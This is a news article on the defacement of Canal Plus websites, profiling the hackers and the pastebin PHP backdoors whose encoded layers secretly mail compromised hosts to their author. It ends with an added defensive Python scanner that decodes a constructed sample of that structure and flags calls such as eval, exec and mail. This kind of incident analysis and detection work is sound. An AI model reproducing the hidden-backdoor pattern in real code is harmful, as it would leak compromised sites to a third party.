Who are the hackers behind the defacement of Canal Plus?

On the evening of Monday March 14th, several of the Canal Plus group’s websites, including Canalplus.fr and Canalplay.com, were briefly defaced by the hackers AMAR^SHG and Moroccanwolf.

For several hours yesterday evening, visitors trying to reach several of the Canal Plus group’s pages were surprised to see a different homepage than usual. Several of the group’s sites had been defaced: in other words, the home page had been replaced by a page created by the hackers.

The page in question denounced the “horrors committed” by certain countries “at war”: “The war against Israel, Kosovo and Serbia, Morocco and Western Sahara, Somalia, Russia, the United States”.
[Image: screenshot of the defaced Canal Plus homepage]

Who are the hackers?

The two hackers don’t seem to belong to the same group. AMAR^SHG claims to be Albanian and belongs to the Shkupi Hacker Group, while Moroccanwolf seems closer to Islamist movements, as a Google search of the websites defaced by this hacker shows:
[Image: Google search results for sites defaced by Moroccanwolf]

Both hackers have a fairly active past: Moroccanwolf alone has defaced several hundred sites, as the archives of the Zone-H website, which lists all of these defacements, show.
[Image: Zone-H archive entries for Moroccanwolf]
[Image: Zone-H archive entries for AMAR^SHG]

Backdoor scripts used by the hackers

During our research, we found various PHP scripts (used as backdoors) that are used to deface websites. The code of some of these scripts was published two days ago on sharing websites such as pastebin.com.
Below is an extract of a PHP script, signed AMAR^SHG, that may have been used by the attackers for “mass defacement”:
[Image: extract of the PHP mass-defacement script]

These “paste” websites are often used by hackers, notably to publish stolen data or lists of targets. The scripts can then be picked up by any amateur hacker looking to deface a website.
That suits the scripts’ authors: certain scripts used by AMAR^SHG contain hidden features.

Below, a PHP variable named “kerupuk” loads a second, encoded script that was also published on pastebin.com:
[Image: the hidden function loaded through the “kerupuk” variable]

By decoding the second script, we were able to determine that certain instructions automatically insert the signature of the original backdoor creator – whose pseudonym is…Kerupuk.

The best part of the story is that this script, once decoded, contained yet more hidden instructions, shown in the following image. According to the code’s comments (“//untuk path folder”, Indonesian for “for the folder path”) it appears to deal with a folder path:
[Image: the second hidden function inside the decoded script]

But decoding this string shows that the variable automatically sends an email whenever the script is executed on a defaced website.
[Image: the decoded email-sending instruction]

In summary, one hidden feature gives the script’s creator publicity, and a feature hidden deeper inside hands over access to the compromised websites, without the hacker who merely used the script knowing it.
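The layered encoding described above (a variable that carries an encoded second script, which in turn hides a signature and an email-sending call) is exactly what an incident responder has to unpick when triaging a web-shell found on a compromised host. The following is an added defensive example, not code from the article or from the scripts it describes: it peels nested base64 layers out of a suspected PHP file and reports which dangerous calls appear only after decoding. The sample script it scans is constructed to mimic the structure reported above; the variable name, the signature, the placeholder address and the inner PHP text are illustrative and the sample is inert text, not a working backdoor.

```python
"""Peel nested base64 layers out of a suspected PHP backdoor and report
which layer hides which dangerous call.

Added defensive example; not code from the article or from the scripts it
describes. SAMPLE_SCRIPT is constructed to mimic the structure the article
reports and is inert text used only as scanner input.
"""
import base64
import binascii
import re

# --- constructed sample input (NOT a real backdoor) ---------------------------
INNER_PHP = (
    "//untuk path folder\n"
    '$host = $_SERVER["HTTP_HOST"];\n'
    '@mail("PLACEHOLDER@example.invalid", "new site", $host);\n'
)
inner_b64 = base64.b64encode(INNER_PHP.encode()).decode()
MIDDLE_PHP = 'echo "<!-- Kerupuk -->";\neval(base64_decode("' + inner_b64 + '"));\n'
middle_b64 = base64.b64encode(MIDDLE_PHP.encode()).decode()
SAMPLE_SCRIPT = '<?php\n$kerupuk = base64_decode("' + middle_b64 + '");\neval($kerupuk);\n'

# Long runs of base64-alphabet characters are candidate encoded payloads.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Calls worth flagging when they turn up in any layer.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "mail": re.compile(r"\bmail\s*\("),
    "fsockopen": re.compile(r"\bfsockopen\s*\("),
    "exec": re.compile(r"\b(?:system|shell_exec|passthru|exec)\s*\("),
    "file_put_contents": re.compile(r"\bfile_put_contents\s*\("),
}


def decode_token(token: str):
    """Return the token decoded as readable text, or None if it is not valid
    base64 or does not decode to printable text (random-looking runs are skipped)."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def peel_layers(source: str, max_depth: int = 8):
    """Repeatedly decode embedded base64 payloads, breadth first.
    Returns the list of layers; layer 0 is the original source."""
    layers = [source]
    frontier = [source]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for match in B64_TOKEN.finditer(text):
                decoded = decode_token(match.group(0))
                if decoded is not None:
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def find_indicators(layers):
    """Map each layer index to the sorted indicator names found in that layer."""
    return {
        i: sorted(name for name, rx in INDICATORS.items() if rx.search(layer))
        for i, layer in enumerate(layers)
    }


def analyze(source: str):
    """Full report: decoded layers, per-layer hits, and the calls that only
    surface after decoding (the 'hidden features')."""
    layers = peel_layers(source)
    hits = find_indicators(layers)
    hidden = {name for i, names in hits.items() if i > 0 for name in names} - set(hits[0])
    return {"layers": layers, "hits": hits, "hidden": sorted(hidden)}


if __name__ == "__main__":
    report = analyze(SAMPLE_SCRIPT)
    for i, layer in enumerate(report["layers"]):
        print(f"--- layer {i}: {report['hits'][i]}")
        print(layer)
    print("calls hidden behind encoding:", report["hidden"])
```

Run against the sample, the outer layer shows only `eval`/`base64_decode`, the first decoded layer exposes the “Kerupuk” signature, and only the second decoded layer reveals the `mail()` call; a file in a web root that needs two rounds of decoding before its real behaviour appears is a strong signal on its own, whatever the calls turn out to be.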

AMAR^SHG’s scripts were published on March 13th, the day before the Canal Plus defacement, which leads us to think that they were used for the attack.

That said, nothing proves that the hackers targeted the channel’s websites in particular.

Canal Plus hacked: collateral damage?

According to the data published on Zone-H, no site the size of the Canal Plus group’s appears to have previously fallen victim to these hackers. They do not seem to work from a list of specific targets but attack any poorly secured server.
In conclusion, the attack on the Vivendi subsidiary could simply have been an opportunistic compromise of a server hosting a large number of websites. The hackers could have broken into that server, launched a mass-defacement script and hit Canal Plus without having targeted it in particular.
